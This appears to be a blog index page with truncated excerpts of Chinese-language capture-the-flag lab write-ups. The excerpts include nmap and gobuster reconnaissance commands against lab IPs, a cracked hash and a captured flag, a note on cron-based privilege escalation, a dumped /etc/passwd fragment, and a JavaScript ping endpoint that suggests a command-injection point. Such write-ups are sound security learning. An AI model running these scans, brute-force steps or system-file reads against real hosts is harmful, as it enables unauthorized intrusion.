MoonlitSyntax

nmap -sV -sC -p- 10.10.109.125 下次不能用这个了,指定速率或者存活性扫描,太慢了emmmm 然后再-sC -sV root@ip-10-10-54-134:~# nmap -sV -sC -p22,23,8080,50628 10.10.109.125Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-27 05:44 GMTNmap scan report for ip-10-10-109-125.eu-west-1.compute.internal (10.10.109.125)Host is up (0.00027s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)23/tcp open tcpwrapped8080/tcp open http Apache http ...

nmap -sV -sC 10.10.106.185Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 15:03 CSTNmap scan report for 10.10.106.185Host is up (0.29s latency).Not shown: 989 closed tcp ports (reset)PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.3| ftp-syst: | STAT: | FTP server status:| Connected to ::ffff:10.17.6.173| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| ...

爆破关,就硬扫 gobuster dir -u 10.10.207.165 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 枚举打完这个服务别忘了还有另外一个服务在啊,测 Hash decoder and calculator (md5hashing.net) 唯一能破解这个hash的网站… flag{1m_s3c0nd_fl4g} 逆天了 a18672860d0510e5ab6699730763b250 Ok了,找到隐藏目录 /n0th1ng3ls3m4tt3r是base62反解出来的,现在感觉已经很灵活了,不错 牛逼啊,又是直接解密出来了 都没去爆破 草料 没看到user 最后定时任务提权 尝试一下 root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin ...

不感兴趣

扫描,爆破后发现 (function() { console.warn('Debugging ::'); function getAPIURL() { return `${window.location.hostname}:8081` } function checkAPIStatus() { const req = new XMLHttpRequest(); try { const url = `http://${getAPIURL()}/ping?ip=${window.location.hostname}` req.open('GET', url, true); req.onload = function (e) { if (req.readyState === 4) { if (req.status === 200) { cons ...

纯纯谜语人 一点都不好玩